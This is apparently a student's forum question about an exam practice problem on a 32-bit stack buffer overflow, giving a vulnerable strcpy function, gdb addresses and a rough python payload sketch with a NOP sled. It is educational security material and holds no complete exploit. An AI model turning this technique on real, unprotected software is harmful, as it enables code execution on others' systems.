I am doing an exam practice question, suppose I have a function like;
void func(char* arg)
{
char buf[32];
strcpy(buf, arg);
}
command break func:
-buf begins at 0xbffebfb0
-(gdb) x/2wx $ebp
0xbfebfd8: 0xbffec068 0x08048fe1
machine is 32 bit little endian, no defenses like aslr or dep
c) You want to run a payload/shellcode that is 24 bytes long,write hex bytes that should be copied into the buffer for an overflow exploit? I don't really know how to go about creating buffer overflows.
However I would want to write in '\x90', but I don't know how much to write and where it lands you
d) Assuming ASLR is enabled, which results in stack being offset by 0-15 each time it runs. Describe a payload in form of a python print statement that will always get the shellcode from part c to execute? ( assume, stack condition from part c holds when offset is 0).
I think the print statement would look like python below;
print shellcode + '\bytes filled in' + pack("<I", shellcode_addr) + pack("<I", return_addr)
But I can't do much on part d without knowing part c, I need some help on how I would solve such c and d.
